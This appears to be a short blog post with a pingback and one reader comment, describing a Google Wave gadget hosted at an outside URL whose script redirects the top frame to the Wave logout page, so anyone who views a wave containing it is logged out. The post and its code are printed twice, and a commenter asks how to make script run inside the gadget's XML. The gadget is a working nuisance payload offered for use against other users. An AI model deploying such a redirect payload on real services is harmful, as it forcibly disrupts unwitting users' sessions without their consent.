Adding this gadget to any wave will make people log out when they see it:
http://beford.org/stuff/waveg.xml
The code:
<script type="text/javascript">
top.location="https://wave.google.com/wave/logout";
</script>
Adding this gadget to any wave will make people log out when they see it:
http://beford.org/stuff/waveg.xml
The code:
<script type="text/javascript">
top.location="https://wave.google.com/wave/logout";
</script>
Pingback: Social Media Security » Social Media Security Podcast 5 – Google Reader, Privacy, Wave, ChromeOS and Foursquare
also i am trying to create another script but problem is that….
tag used as a XML tag…thats why script is not running…!!
how to run script in XML>…?
you can see at the example:
top.location="https://wave.google.com/wave/logout";